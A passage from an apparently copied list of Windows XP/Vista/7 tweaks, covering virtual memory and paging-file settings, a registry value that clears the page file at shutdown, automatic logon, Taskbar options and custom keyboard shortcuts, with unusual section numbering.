In the Advanced tab, both Processor Scheduling and Memory usage are optimised for programs' performance. Change to Background services and System cache if you use your PC as a server, and programs' performance is secondary.

3. Virtual memory

In Virtual Memory, click Change > Custom size, and enter an upper and lower limit for your virtual memory. Try one and a half times the amount of RAM as your lower limit, and two to three times your RAM for the upper limit.

VV****. Disable paging file
If you're running a 64-bit version of Windows, have more than 4GB RAM installed, and don't perform memory-intensive operations, you could improve performance by disabling the paging file. In "Advanced system settings", choose Performance > Advanced, click Change under Virtual memory and choose "No paging file".

VVV. Clear paging file at shutdown

Windows uses the paging file on your hard drive as if it were RAM, and this routinely holds temporary data to free up your RAM. When you shut down your PC, this file is normally preserved, which can lead to inefficiency, because it slowly clutters up your system.

If your data is sensitive, this could also be a security threat, since it remains accessible even after you've deleted or destroyed the files it contains.

This edit flushes out the swap file whenever you shut down. Open the Registry Editor and browse to the key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management.

This contains a number of configurations for RAM and virtual memory. Either create or modify the DWORD value called "ClearPageFileAtShutdown", which defines whether the memory flush happens. To turn it on, set the value to "1".

VVV*. Quick access to Task Manager

You may be used to accessing Task Manager by pressing [Ctrl] + [Alt] + [Del] and then selecting it from the resulting screen. You can also get quick access to it in a way that's less intrusive, however: right-click the Taskbar and choose Task Manager.

VVV**. Change user picture

Click the Start button and then click your user picture. In the resulting dialog, choose Change your picture > Browse for more pictures. Locate the photo you want to use and click OK. Click Change Picture, followed by OK to confirm your choice.

VVV***. Autohide the Taskbar

You can free up more screen space by hiding the Taskbar. Right-click it, choose Properties and select Auto-hide. To access it when you want it, just drag the mouse to the bottom of your screen and it'll pop up.

VVV****. Get past the welcome screen

You can automatically log on and bypass the welcome screen with this simple tweak. Choose Start > Run and type "control userpasswords2" into the Open bar.

Click OK to see a dialog with each user installed on the PC. Clear the box marked "Users must enter a username and password to use this computer". Click OK. Now restart, and you'll go directly to your desktop.
©Prasoon nigam
XX. Custom keyboard shortcuts
Works with: XP, Vista, Windows 7

Create keyboard shortcuts to launch any program shortcut. Right-click the shortcut icon and choose Properties. Select the Shortcut key box and press a letter on the keyboard, (such as [H]) and click OK. Now [Ctrl] + [Alt] + [H] will launch the shortcut.